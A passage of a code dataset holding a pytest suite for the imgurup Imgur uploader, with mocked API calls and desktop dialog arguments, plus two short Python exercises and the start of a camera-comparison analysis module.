]\n","repo_name":"IpursueI/tencent_mini","sub_path":"mini/pet/migrations/0004_auto_20160625_0809.py","file_name":"0004_auto_20160625_0809.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"11903204584","text":"from __future__ import unicode_literals\n\nimport pytest\n\nimport mock\nfrom mock import call\nfrom mock import patch\nimport httpretty\nimport pytest_httpretty\n\nimport io\nimport sys\nimport os\n\nimport imgurup\nfrom imgurup import CLIImgur\nfrom imgurup import MacImgur\nfrom imgurup import KDEImgur\nfrom imgurup import ZenityImgur\n\n\ndef get_builtin_name(builtin_name):\n name = ('builtins.%s' if sys.version_info >= (3,) else '__builtin__.%s') % builtin_name\n return name\n\n\nclass TestImgurFactory:\n\n def setup(self):\n from imgurup import ImgurFactory\n self.ImgurFactory = ImgurFactory\n self.imgurFactory = ImgurFactory()\n\n def test_init(self):\n assert self.ImgurFactory\n\n @pytest.fixture(scope='function')\n def mock_sys(self, request):\n m = mock.patch('imgurup.sys')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_get_instance_cli(self, monkeypatch):\n monkeypatch.delenv('KDE_FULL_SESSION', raising=False)\n monkeypatch.delenv('DESKTOP_SESSION', raising=False)\n monkeypatch.setattr(imgurup.sys, 'platform', None)\n prefer_gui = True\n assert type(self.ImgurFactory.get_instance(prefer_gui)) == CLIImgur\n prefer_gui = False\n assert type(self.ImgurFactory.get_instance(prefer_gui)) == CLIImgur\n\n def test_get_instance_kde(self, monkeypatch):\n monkeypatch.setenv('KDE_FULL_SESSION', 'true')\n monkeypatch.setenv('DESKTOP_SESSION', '')\n monkeypatch.setattr(imgurup.sys, 'platform', 'linux2')\n prefer_gui = True\n assert type(self.ImgurFactory.get_instance(prefer_gui)) == KDEImgur\n\n def test_get_instance_mac(self, monkeypatch):\n monkeypatch.delenv('KDE_FULL_SESSION', raising=False)\n 
monkeypatch.delenv('DESKTOP_SESSION', raising=False)\n monkeypatch.setattr(imgurup.sys, 'platform', 'darwin')\n prefer_gui = True\n assert type(self.ImgurFactory.get_instance(prefer_gui) == MacImgur)\n\n def test_get_instance_gnome(self, monkeypatch):\n monkeypatch.delenv('KDE_FULL_SESSION', raising=False)\n monkeypatch.setenv('DESKTOP_SESSION', 'gnome')\n monkeypatch.setattr(imgurup.sys, 'platform', 'linux2')\n prefer_gui = True\n assert type(self.ImgurFactory.get_instance(prefer_gui)) == ZenityImgur\n\n def test_get_instance_pantheon(self, monkeypatch):\n monkeypatch.delenv('KDE_FULL_SESSION', raising=False)\n monkeypatch.setenv('DESKTOP_SESSION', 'pantheon')\n monkeypatch.setattr(imgurup.sys, 'platform', 'linux2')\n prefer_gui = True\n assert type(self.ImgurFactory.get_instance(prefer_gui)) == ZenityImgur\n\n\nclass TestCLIImgur:\n\n def setup(self):\n self.imgur = CLIImgur()\n self.imgur.connect()\n self._enter_token_msg = self.imgur._enter_token_msg\n self._auth_url = self.imgur._auth_url\n self._auth_msg = self.imgur._auth_msg\n self._no_album_msg = self.imgur._no_album_msg\n self._token_config = (\n '[Token]\\n'\n 'access_token = 0000000000000000000000000000000000000000\\n'\n 'refresh_token = 1111111111111111111111111111111111111111\\n'\n )\n self._token_response = (\n '{\"access_token\":\"2222222222222222222222222222222222222222\",'\n '\"expires_in\":3600,'\n '\"token_type\":\"bearer\",'\n '\"scope\":null,'\n '\"refresh_token\":\"3333333333333333333333333333333333333333\",'\n '\"account_username\":\"carlcarl\"}'\n )\n self._token_json_response = {\n u'access_token': u'2222222222222222222222222222222222222222',\n u'expires_in': 3600,\n u'token_type': u'bearer',\n u'account_username': u'carlcarl',\n u'scope': None,\n u'refresh_token': u'3333333333333333333333333333333333333333'\n }\n self._album_response = (\n '{\"data\":[{\"id\":\"XXXXX\",'\n '\"title\":\"temp\",'\n '\"description\":null,'\n '\"datetime\":1352238500,'\n '\"cover\":\"Oin6z\",'\n '\"cover_width\":1891,'\n '\"cover_height\":967,'\n '\"account_url\":\"carlcarl\",'\n '\"privacy\":\"hidden\",'\n '\"layout\":\"grid\",'\n '\"views\":2,'\n '\"link\":\"http:\\/\\/imgur.com\\/a\\/XXXXX\",'\n '\"favorite\":false,'\n '\"nsfw\":null,'\n '\"section\":null,'\n '\"deletehash\":\"000000000000000\",'\n '\"order\":0}],'\n '\"success\":true,'\n '\"status\":200}'\n )\n self._album_fail_response = (\n '{\"data\":{\"error\": \"fail\"},'\n '\"success\":false,'\n '\"status\":200}'\n )\n self._album_json_response = {\n u'status': 200,\n u'data': [\n {\n u'deletehash': u'000000000000000',\n u'layout': u'grid',\n u'description': None,\n u'title': u'temp',\n u'cover_height': 967,\n u'views': 2,\n u'privacy': u'hidden',\n u'cover': u'Oin6z',\n u'datetime': 1352238500,\n u'account_url': u'carlcarl',\n u'favorite': False,\n u'cover_width': 1891,\n u'link': u'http://imgur.com/a/XXXXX',\n u'section': None,\n u'nsfw': None,\n u'order': 0,\n u'id': u'XXXXX'\n }\n ],\n u'success': True\n }\n self._albums = [\n {\n 'id': '1',\n 'title': 'hello',\n 'privacy': 'public'\n },\n {\n 'id': '2',\n 'title': 'hello2',\n 'privacy': 'private'\n }\n ]\n self._image_link = 'http://i.imgur.com/xxxxxxx.jpg'\n self._delete_hash = 'xxxxxxxxxxxxxxx'\n\n @pytest.fixture(scope='function')\n def mock_HTTPSConnection(self, request):\n m = mock.patch('imgurup.httplib.HTTPSConnection')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_connect(self, mock_HTTPSConnection):\n _imgur = CLIImgur()\n _imgur.connect()\n mock_HTTPSConnection.assert_has_calls(\n 
[\n call('api.imgur.com')\n ]\n )\n\n def test_set_tokens_using_config(self, monkeypatch):\n\n with patch(get_builtin_name('open'), return_value=io.StringIO(self._token_config)):\n self.imgur.set_tokens_using_config()\n assert self.imgur._access_token == '0000000000000000000000000000000000000000'\n assert self.imgur._refresh_token == '1111111111111111111111111111111111111111'\n\n def test_is_success(self):\n response = {}\n response['success'] = True\n response['data'] = {}\n response['data']['error'] = 'error'\n assert self.imgur.is_success(response) is True\n response['success'] = False\n assert self.imgur.is_success(response) is False\n\n def test_write_tokens_to_config(self):\n from mock import mock_open\n self.imgur._access_token = '0000000000000000000000000000000000000000'\n self.imgur._refresh_token = '1111111111111111111111111111111111111111'\n with patch('imgurup.SafeConfigParser.read'):\n m = mock_open()\n with patch(get_builtin_name('open'), m, create=True):\n self.imgur.write_tokens_to_config()\n m.assert_called_once_with(self.imgur.CONFIG_PATH, 'w')\n handle = m()\n handle.write.assert_has_calls(\n [\n call('[Token]\\n'),\n call('access_token = 0000000000000000000000000000000000000000\\n'),\n call('refresh_token = 1111111111111111111111111111111111111111\\n'),\n ]\n )\n\n def test_get_error_dialog_args(self):\n assert self.imgur.get_error_dialog_args() is None\n\n def test_get_auth_msg_dialog_args(self):\n with pytest.raises(NotImplementedError):\n self.imgur.get_auth_msg_dialog_args(self._auth_msg, self._auth_url)\n\n def test_get_enter_pin_dialog_args(self):\n with pytest.raises(NotImplementedError):\n self.imgur.get_enter_pin_dialog_args(self._enter_token_msg)\n\n @pytest.mark.httpretty\n def test_request_album_list_me_success(self, monkeypatch):\n httpretty.register_uri(\n httpretty.GET,\n \"https://api.imgur.com/3/account/me/albums\",\n body=self._album_response,\n status=200\n )\n with patch(get_builtin_name('open'), return_value=io.StringIO(self._token_config)):\n json_response = self.imgur.request_album_list()\n assert len(json_response) == 1\n\n @pytest.mark.httpretty\n def test_request_album_list_carlcarl_success(self, monkeypatch):\n httpretty.register_uri(\n httpretty.GET,\n \"https://api.imgur.com/3/account/carlcarl/albums\",\n body=self._album_response,\n status=200\n )\n with patch(get_builtin_name('open'), return_value=io.StringIO(self._token_config)):\n json_response = self.imgur.request_album_list(account='carlcarl')\n assert len(json_response) == 1\n\n @pytest.mark.httpretty\n def test_request_album_list_me_fail(self, monkeypatch):\n httpretty.register_uri(\n httpretty.GET,\n \"https://api.imgur.com/3/account/me/albums\",\n body=self._album_fail_response,\n status=200\n )\n m = mock.Mock(return_value=None)\n monkeypatch.setattr(\n imgurup.CLIImgur,\n 'request_new_tokens_and_update',\n m\n )\n monkeypatch.setattr(\n imgurup.CLIImgur,\n 'write_tokens_to_config',\n m\n )\n monkeypatch.setattr(\n imgurup.time,\n 'sleep',\n m\n )\n with pytest.raises(SystemExit):\n self.imgur.request_album_list()\n\n @pytest.mark.httpretty\n def test_request_new_token(self):\n httpretty.register_uri(\n httpretty.POST,\n \"https://api.imgur.com/oauth2/token\",\n body=self._token_response,\n status=200\n )\n json_response = self.imgur.request_new_tokens()\n assert json_response == self._token_json_response\n\n @pytest.mark.httpretty\n def test_request_new_tokens_and_update(self):\n httpretty.register_uri(\n httpretty.POST,\n \"https://api.imgur.com/oauth2/token\",\n 
body=self._token_response,\n status=200\n )\n # Fail case which without token values in config\n with patch(get_builtin_name('open'), return_value=io.StringIO('')):\n with pytest.raises(SystemExit):\n self.imgur.request_new_tokens_and_update()\n\n # Success case\n with patch(get_builtin_name('open'), return_value=io.StringIO(self._token_config)):\n self.imgur.request_new_tokens_and_update()\n assert self.imgur._access_token == '2222222222222222222222222222222222222222'\n assert self.imgur._refresh_token == '3333333333333333333333333333333333333333'\n\n self.imgur._refresh_token = '3333333333333333333333333333333333333333'\n with patch('imgurup.CLIImgur.request_new_tokens') as request_new_tokens:\n request_new_tokens.return_value = {\n 'success': False,\n 'data': {\n 'error': 'error'\n }\n }\n with pytest.raises(SystemExit):\n self.imgur.request_new_tokens_and_update()\n\n @pytest.fixture(scope='function')\n def mock_raw_input(self, request):\n m = mock.patch('imgurup.input')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_ask_pin(self, mock_raw_input):\n pin = '000000'\n mock_raw_input.return_value = pin\n assert self.imgur.ask_pin(\n self._auth_msg,\n self._auth_url,\n self._enter_token_msg) == pin\n\n @pytest.fixture(scope='function')\n def mock_ask_pin(self, request):\n m = mock.patch('imgurup.CLIImgur.ask_pin')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n @pytest.mark.httpretty\n def test_auth(self, mock_ask_pin):\n mock_ask_pin.return_value = '000000'\n httpretty.register_uri(\n httpretty.POST,\n 'https://api.imgur.com/oauth2/token',\n body=(\n '{\"success\":false,'\n '\"data\":{\"error\":\"error\"} }'\n ),\n status=200\n )\n with pytest.raises(SystemExit):\n self.imgur.auth()\n\n httpretty.register_uri(\n httpretty.POST,\n 'https://api.imgur.com/oauth2/token',\n body=(\n '{\"success\":true,'\n '\"access_token\":\"1111111111111111111111111111111111111111\",'\n '\"refresh_token\":\"2222222222222222222222222222222222222222\"}'\n ),\n status=200\n )\n self.imgur.auth()\n assert self.imgur._access_token == '1111111111111111111111111111111111111111'\n assert self.imgur._refresh_token == '2222222222222222222222222222222222222222'\n\n def test_get_ask_image_path_dialog_args(self):\n with pytest.raises(NotImplementedError):\n self.imgur.get_ask_image_path_dialog_args()\n\n def test_ask_image_path(self, mock_raw_input):\n path = '/home/test/test.jpg'\n mock_raw_input.return_value = path\n assert self.imgur.ask_image_path() == path\n\n def test_get_ask_album_id_dialog_args(self):\n with pytest.raises(NotImplementedError):\n self.imgur.get_ask_album_id_dialog_args(\n self._albums,\n self._no_album_msg\n )\n\n def test_ask_album_id(self):\n with patch('imgurup.input', return_value=1):\n assert self.imgur.ask_album_id(self._albums) == '1'\n\n def test_get_show_link_dialog_args(self):\n with pytest.raises(NotImplementedError):\n self.imgur.get_show_link_dialog_args({})\n\n @pytest.fixture(scope='function')\n def mock_print(self, request):\n m = mock.patch(get_builtin_name('print'))\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_show_link(self, mock_print):\n self.imgur.show_link(self._image_link, self._delete_hash)\n mock_print.assert_has_calls(\n [\n call('Link: http://i.imgur.com/xxxxxxx.jpg'),\n call('Delete link: http://imgur.com/delete/xxxxxxxxxxxxxxx')\n ]\n )\n\n def test_encode_multipart_data(self):\n \"\"\"Just test if the function can work\"\"\"\n post_data = {\n 'title': 'test',\n }\n files = {\n 'image': 
os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n 'images',\n 'test.jpg'\n ),\n }\n try:\n self.imgur._encode_multipart_data(post_data, files)\n assert True\n except:\n assert False\n\n\n @pytest.mark.httpretty\n def test_request_upload_image_success(self):\n httpretty.register_uri(\n httpretty.POST,\n 'https://api.imgur.com/3/image',\n body=self._album_response,\n status=200\n )\n json_response = self.imgur.request_upload_image(\n 'https://api.imgur.com/3/image',\n body='',\n headers={}\n )\n assert len(json_response) == 1\n\n @pytest.mark.httpretty\n def test_request_upload_image_fail(self, monkeypatch):\n httpretty.register_uri(\n httpretty.POST,\n 'https://api.imgur.com/3/image',\n body=self._album_fail_response,\n status=200\n )\n m = mock.Mock(return_value=None)\n monkeypatch.setattr(\n imgurup.CLIImgur,\n 'request_new_tokens_and_update',\n m\n )\n monkeypatch.setattr(\n imgurup.CLIImgur,\n 'write_tokens_to_config',\n m\n )\n monkeypatch.setattr(\n imgurup.time,\n 'sleep',\n m\n )\n with pytest.raises(SystemExit):\n self.imgur.request_upload_image(\n 'https://api.imgur.com/3/image',\n body='',\n headers={}\n )\n\n\nclass TestZenityImgur:\n\n def setup(self):\n from imgurup import ZenityImgur\n self.imgur = ZenityImgur()\n self._enter_token_msg = self.imgur._enter_token_msg\n self._auth_url = self.imgur._auth_url\n self._auth_msg = self.imgur._auth_msg\n self._no_album_msg = self.imgur._no_album_msg\n self._albums = [\n {\n 'id': '1',\n 'title': 'hello',\n 'privacy': 'public'\n },\n {\n 'id': '2',\n 'title': 'hello2',\n 'privacy': 'private'\n }\n ]\n self._auth_msg_dialog_args = [\n 'zenity',\n '--entry',\n (\n '--text=This is the first time you use this program, '\n 'you have to visit this URL in your browser '\n 'and copy the PIN code: \\n'\n ),\n (\n '--entry-text=https://api.imgur.com/oauth2/authorize?'\n 'client_id=55080e3fd8d0644&response_type=pin&state=carlcarl'\n )\n ]\n self._enter_pin_dialog_args = [\n 'zenity',\n '--entry',\n '--text=Enter PIN code displayed in the browser: ',\n ]\n self._ask_album_id_dialog_args = [\n 'zenity',\n '--list',\n '--text=\"Choose the album\"',\n '--column=No.',\n '--column=Album name',\n '--column=Privacy',\n '1',\n 'hello',\n 'public',\n '2',\n 'hello2',\n 'private',\n '3',\n 'Do not move to any album',\n 'public'\n ]\n self._image_link = 'http://i.imgur.com/xxxxxxx.jpg'\n self._delete_hash = 'xxxxxxxxxxxxxxx'\n\n @pytest.fixture(scope='function')\n def mock_subprocess(self, request):\n m = mock.patch('imgurup.subprocess')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_show_error_and_exit(self, mock_subprocess):\n mock_subprocess.Popen.return_value.returncode = 0\n with pytest.raises(SystemExit):\n self.imgur.show_error_and_exit(1)\n\n def test_get_error_dialog_args(self):\n result = self.imgur.get_error_dialog_args()\n args = [\n 'zenity',\n '--error',\n '--text=Error',\n ]\n assert result == args\n\n def test_get_auth_msg_dialog_args(self):\n result = self.imgur.get_auth_msg_dialog_args(self._auth_msg, self._auth_url)\n assert result == self._auth_msg_dialog_args\n\n def test_get_enter_pin_dialog_args(self):\n result = self.imgur.get_enter_pin_dialog_args(self._enter_token_msg)\n assert result == self._enter_pin_dialog_args\n\n\n @pytest.fixture(scope='function')\n def mock_get_auth_msg_dialog_args(self, request):\n m = mock.patch('imgurup.ZenityImgur.get_auth_msg_dialog_args')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_ask_pin(\n self,\n 
mock_get_auth_msg_dialog_args,\n mock_subprocess\n ):\n def _test_ask_pin(args, stdout, stderr):\n from mock import MagicMock\n m = MagicMock()\n if args == self._auth_msg_dialog_args:\n m.communicate = lambda: ['']\n elif args == self._enter_pin_dialog_args:\n m.communicate = lambda: ['XXXXXX']\n return m\n\n mock_get_auth_msg_dialog_args.return_value = self._auth_msg_dialog_args\n mock_subprocess.Popen.side_effect = _test_ask_pin\n pin = self.imgur.ask_pin(\n self._auth_msg,\n self._auth_url,\n self._enter_token_msg\n )\n assert pin == 'XXXXXX'\n mock_subprocess.Popen.assert_has_calls(\n [\n call(\n self._auth_msg_dialog_args,\n stdout=mock_subprocess.PIPE,\n stderr=mock_subprocess.PIPE\n ),\n call(\n self._enter_pin_dialog_args,\n stdout=mock_subprocess.PIPE,\n stderr=mock_subprocess.PIPE\n )\n ]\n )\n\n def test_get_ask_image_path_dialog_args(self):\n result = self.imgur.get_ask_image_path_dialog_args()\n args = [\n 'zenity',\n '--file-selection',\n ]\n assert result == args\n\n def test_ask_image_path(self, mock_subprocess):\n # Fail case\n mock_subprocess.Popen.return_value.communicate = lambda: ['']\n with pytest.raises(SystemExit):\n self.imgur.ask_image_path()\n # Success case\n mock_subprocess.Popen.return_value.communicate = lambda: ['/tmp/test.jpg']\n image_path = self.imgur.ask_image_path()\n assert image_path == '/tmp/test.jpg'\n\n def test_get_ask_album_id_dialog_args(self):\n no_album_msg = self._no_album_msg\n result = self.imgur.get_ask_album_id_dialog_args(self._albums, no_album_msg)\n assert result == self._ask_album_id_dialog_args\n\n @pytest.fixture(scope='function')\n def mock_get_ask_album_id_dialog_args(self, request):\n m = mock.patch('imgurup.ZenityImgur.get_ask_album_id_dialog_args')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_ask_album_id(\n self,\n mock_get_ask_album_id_dialog_args,\n mock_subprocess\n ):\n mock_get_ask_album_id_dialog_args.return_value = self._ask_album_id_dialog_args\n mock_subprocess.Popen.return_value.communicate = lambda: ['1']\n result = self.imgur.ask_album_id(self._albums)\n assert result == '1'\n mock_subprocess.Popen.return_value.communicate = lambda: ['']\n with pytest.raises(SystemExit):\n self.imgur.ask_album_id(self._albums)\n\n def test_get_show_link_dialog_args(self):\n links = (\n 'Link: http://i.imgur.com/xxxxxxx.jpg\\n'\n 'Delete link: http://imgur.com/delete/xxxxxxxxxxxxxxx'\n )\n result = self.imgur.get_show_link_dialog_args(links)\n args = [\n 'zenity',\n '--info',\n (\n '--text=Link: http://i.imgur.com/xxxxxxx.jpg\\n'\n 'Delete link: http://imgur.com/delete/xxxxxxxxxxxxxxx'\n )\n ]\n assert result == args\n\n def test_show_link(self, mock_subprocess):\n self.imgur.show_link(self._image_link, self._delete_hash)\n mock_subprocess.Popen.assert_has_calls(\n [\n call(\n [\n 'zenity',\n '--info',\n (\n '--text=Link: http://i.imgur.com/xxxxxxx.jpg\\n'\n 'Delete link: http://imgur.com/delete/xxxxxxxxxxxxxxx'\n )\n ],\n stdout=mock_subprocess.PIPE,\n stderr=mock_subprocess.PIPE\n )\n ]\n )\n\n\nclass TestKDEImgur:\n def setup(self):\n from imgurup import KDEImgur\n self.imgur = KDEImgur()\n self._enter_token_msg = self.imgur._enter_token_msg\n self._auth_url = self.imgur._auth_url\n self._auth_msg = self.imgur._auth_msg\n self._no_album_msg = self.imgur._no_album_msg\n\n def test_get_error_dialog_args(self):\n result = self.imgur.get_error_dialog_args()\n args = [\n 'kdialog',\n '--error',\n 'Error',\n ]\n assert result == args\n\n def test_get_auth_msg_dialog_args(self):\n result = 
self.imgur.get_auth_msg_dialog_args(self._auth_msg, self._auth_url)\n args = [\n 'kdialog',\n '--msgbox',\n (\n 'This is the first time you use this program, '\n 'you have to visit this URL in your browser '\n 'and copy the PIN code: \\n'\n 'https://api.imgur.com/oauth2/authorize?'\n 'client_id=55080e3fd8d0644&response_type=pin&state=carlcarl'\n )\n ]\n assert result == args\n\n def test_get_enter_pin_dialog_args(self):\n result = self.imgur.get_enter_pin_dialog_args(self._enter_token_msg)\n args = [\n 'kdialog',\n '--title',\n 'Input dialog',\n '--inputbox',\n 'Enter PIN code displayed in the browser: ',\n ]\n assert result == args\n\n def test_get_ask_image_path_dialog_args(self):\n result = self.imgur.get_ask_image_path_dialog_args()\n args = [\n 'kdialog',\n '--getopenfilename',\n '.',\n ]\n assert result == args\n\n def test_get_ask_album_id_dialog_args(self):\n albums = []\n albums.append(\n {\n 'title': 'hello',\n 'privacy': 'public'\n }\n )\n albums.append(\n {\n 'title': 'hello2',\n 'privacy': 'private'\n }\n )\n no_album_msg = self._no_album_msg\n result = self.imgur.get_ask_album_id_dialog_args(albums, no_album_msg)\n args = [\n 'kdialog',\n '--menu',\n '\"Choose the album\"',\n '1',\n 'hello(public)',\n '2',\n 'hello2(private)',\n '3',\n 'Do not move to any album(public)',\n ]\n assert result == args\n\n def test_get_show_link_dialog_args(self):\n links = (\n 'http://imgur.com/aaaaa\\n'\n 'Delete link: http://imgur.com/delete/bbbbb'\n )\n result = self.imgur.get_show_link_dialog_args(links)\n args = [\n 'kdialog',\n '--msgbox',\n (\n 'http://imgur.com/aaaaa\\n'\n 'Delete link: http://imgur.com/delete/bbbbb'\n )\n ]\n assert result == args\n\n\nclass TestMacImgur:\n\n def setup(self):\n from imgurup import MacImgur\n self.imgur = MacImgur()\n self._enter_token_msg = self.imgur._enter_token_msg\n self._auth_url = self.imgur._auth_url\n self._auth_msg = self.imgur._auth_msg\n self._no_album_msg = self.imgur._no_album_msg\n self._albums = [\n {\n 'id': '1',\n 'title': 'hello',\n 'privacy': 'public'\n },\n {\n 'id': '2',\n 'title': 'hello2',\n 'privacy': 'private'\n }\n ]\n self._image_link = 'http://i.imgur.com/xxxxxxx.jpg'\n self._delete_hash = 'xxxxxxxxxxxxxxx'\n\n def test_get_error_dialog_args(self):\n result = self.imgur.get_error_dialog_args()\n args = [\n 'osascript',\n '-e',\n (\n 'tell app \"Finder\" to display alert '\n '\"Error\" as warning'\n ),\n ]\n assert result == args\n\n def test_get_auth_msg_dialog_args(self):\n result = self.imgur.get_auth_msg_dialog_args(self._auth_msg, self._auth_url)\n args = [\n 'osascript',\n '-e',\n (\n 'tell app \"SystemUIServer\" to display dialog '\n '\"This is the first time you use this program, '\n 'you have to visit this URL in your browser '\n 'and copy the PIN code: \\n\" '\n 'default answer '\n '\"https://api.imgur.com/oauth2/authorize?'\n 'client_id=55080e3fd8d0644&response_type=pin&state=carlcarl\" '\n 'with icon 1'\n ),\n ]\n assert result == args\n\n def test_get_enter_pin_dialog_args(self):\n result = self.imgur.get_enter_pin_dialog_args(self._enter_token_msg)\n args = [\n 'osascript',\n '-e',\n (\n 'tell app \"SystemUIServer\" to display dialog '\n '\"Enter PIN code displayed in the browser: \" '\n 'default answer \"\" with icon 1'\n ),\n '-e',\n 'text returned of result',\n ]\n assert result == args\n\n def test_get_ask_image_path_dialog_args(self):\n result = self.imgur.get_ask_image_path_dialog_args()\n args = [\n 'osascript',\n '-e',\n (\n 'tell app \"Finder\" to POSIX path of '\n '(choose file with prompt \"Choose 
Image:\")'\n ),\n ]\n assert result == args\n\n def test_get_ask_album_id_dialog_args(self):\n albums = []\n no_album_msg = self._no_album_msg\n assert self.imgur.get_ask_album_id_dialog_args(albums, no_album_msg) is None\n\n @pytest.fixture(scope='function')\n def mock_subprocess(self, request):\n m = mock.patch('imgurup.subprocess')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_ask_album_id(self, mock_subprocess):\n mock_subprocess.Popen.return_value.communicate = lambda: ['1 Public(public)']\n assert self.imgur.ask_album_id(self._albums) == '1'\n mock_subprocess.Popen.return_value.communicate = lambda: ['1Public(public)']\n with pytest.raises(SystemExit):\n self.imgur.ask_album_id(self._albums)\n mock_subprocess.Popen.return_value.communicate = lambda: [' Public(public)']\n with pytest.raises(SystemExit):\n self.imgur.ask_album_id(self._albums)\n\n def test_get_show_link_dialog_args(self):\n links = (\n 'http://imgur.com/aaaaa\\n'\n 'Delete link: http://imgur.com/delete/bbbbb'\n )\n assert self.imgur.get_show_link_dialog_args(links) is None\n\n def test_show_link(self, mock_subprocess):\n show_link_args = [\n 'osascript',\n '-e',\n (\n 'tell app \"Finder\" to display dialog \"Image Link\" '\n 'default answer \"{link}\" '\n 'buttons {{\"Show delete link\", \"OK\"}} '\n 'default button 2'.format(link=self._image_link)\n ),\n ]\n delete_link = 'http://imgur.com/delete/{delete}'.format(delete=self._delete_hash)\n delete_link_args = [\n 'osascript',\n '-e',\n (\n 'tell app \"Finder\" to display dialog \"Delete link\" '\n 'default answer \"{link}\"'.format(link=delete_link)\n ),\n ]\n\n def _test_show_link(args, stdout, stderr):\n from mock import MagicMock\n m = MagicMock()\n if args == show_link_args:\n m.communicate = lambda: [\n (\n 'button returned:Show delete link, '\n 'text returned:http://i.imgur.com/xxxxxxx.jpg'\n )\n ]\n elif args == delete_link_args:\n m.communicate = lambda: ['']\n return m\n\n mock_subprocess.Popen.side_effect = _test_show_link\n self.imgur.show_link(self._image_link, self._delete_hash)\n mock_subprocess.Popen.assert_has_calls(\n [\n call(\n show_link_args,\n stdout=mock_subprocess.PIPE,\n stderr=mock_subprocess.PIPE\n ),\n call(\n delete_link_args,\n stdout=mock_subprocess.PIPE,\n stderr=mock_subprocess.PIPE\n )\n ]\n )\n\n @pytest.fixture(scope='function')\n def mock_copy2(self, request):\n m = mock.patch('imgurup.shutil.copy2')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n @pytest.fixture(scope='function')\n def mock_argparse(self, request):\n m = mock.patch('imgurup.argparse')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_main(self, mock_argparse, mock_copy2):\n from argparse import Namespace\n n = Namespace()\n n.s = True\n mock_argparse.ArgumentParser.return_value.parse_args = lambda: n\n from imgurup import main\n main()\n","repo_name":"carlcarl/imgurup","sub_path":"tests/test_imgurup.py","file_name":"test_imgurup.py","file_ext":"py","file_size_in_byte":32861,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"40463402637","text":"def leiaint(msg):\n while True:\n valor = input(msg)\n if valor.isnumeric():\n print(f'Você digitou o valor {valor}')\n return valor\n else:\n print(f'Digitou errado corno.')\n\n\n#Programa principal:\nn = leiaint('Digite um número 
inteiro:')\nprint(n)\n\n","repo_name":"MathBergamo/Python","sub_path":"CeV/Ex#104.py","file_name":"Ex#104.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40268512140","text":"fizz = 0\nbuzz = 0\n\nnumLow = input(\"Enter the start number\")\nnumHigh = input(\"Enter the end number\")\n\nfor x in range(numLow, numHigh + 1):\n\tfizz = 0 #reset fizzbuzz variables\n\tbuzz = 0\n\tif(x+1)%3 == 0:\n\t\tfizz = 1\t#setting fizzbuzz based on modulo of 3 or 5\n\tif(x+1)%5 == 0:\n\t\tbuzz = 1\n\t\n\tif(fizz and buzz):\n\t\tprint(\"FizzBuzz!\") #printing based off of fuzzbuzz variables\n\telif(fizz):\n\t\tprint(\"Fizz\")\n\telif(buzz):\n\t\tprint(\"Buzz\")\n\telse:\n\t\tprint(x+1)","repo_name":"IMDCGP105-1819/portfolio-Oshawatt123","sub_path":"Documents/ex10.py","file_name":"ex10.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1882416582","text":"\"\"\" camera comparison \"\"\"\n\nimport itertools\nfrom collections import defaultdict\n\nimport numpy as np\nfrom tqdm import tnrange\n\nfrom pelops.analysis.camerautil import (get_match_id, glue, make_good_bad,\n nameit_cam, nameit_car)\n\n\ndef eval_good_bad(first, second, clf, featuredataset, goodmatches, badmatches, attribute_name):\n \"\"\"\n label examples of good and bad comparisons\n\n take two chips, concantenate their feature vectors\n and create a balanced dataset of matches and differences\n\n first(Chip): image to evaluate\n second(Chip): image to evaluate\n clr(classifier): classifier used to evaluate chips\n fd(featureDataset): maps chips to features\n goodmatches(defaultdictionary(int)): counts of good matches\n badmatches(defaultdictionary(int)): counts of bad matches\n attribute_name(str): which attribute to pull names from\n \"\"\"\n\n namefunc = None\n if attribute_name == 'car':\n namefunc = nameit_car\n else:\n namefunc = nameit_cam\n\n bigvec1 = glue(featuredataset.get_feats_for_chip(first),\n featuredataset.get_feats_for_chip(second))\n\n bigvec1np = np.array(bigvec1)\n #bigvec1np.reshape(1, -1)\n\n bigvec2 = glue(featuredataset.get_feats_for_chip(second),\n featuredataset.get_feats_for_chip(first))\n\n bigvec2np = np.array(bigvec2)\n # bigvec2np.reshape(1, -1))\n\n decision = clf.predict(bigvec1np.reshape(1, -1))\n name = namefunc(first, second)\n\n tally_decision(decision, goodmatches, name, badmatches)\n\n decision = clf.predict(bigvec2np.reshape(1, -1))\n name = namefunc(second, first)\n\n tally_decision(decision, goodmatches, name, badmatches)\n\n\ndef tally_decision(decision, goodpic, name, badpic):\n \"\"\"\n count the number of matches for a name\n\n decision(int): whether the classifier said they matched\n goodpic(defaultdict(int)): list of good matches\n badpic(defaultdict(int)): list of bad matches\n name(str): concatenation of names of first and second pics\n \"\"\"\n if decision == 1:\n goodpic[name] += 1\n else:\n badpic[name] += 1\n\n\ndef mad_matrix(examples, clf, featuredataset, examplegenerator, attribute_name='car'):\n \"\"\"\n run examples experiments to see how cars are declaired\n the same or different by the clf classifier.abs\n\n examples(int): number of trials\n clf(classifier): classifier to make same/different distinciton\n fd(featureDataset) : allows joining of chip to features\n eg(experimentGenerator): makes expermients for testing\n \"\"\"\n\n ddg = defaultdict(int)\n ddb = defaultdict(int)\n\n 
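# (editor's note) ddg/ddb tally, per concatenated chip name, how often the\n    # classifier labels a pair a match vs. a mismatch; tnrange is tqdm's\n    # notebook-aware range, so the trial loop below reports its progress.\n    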
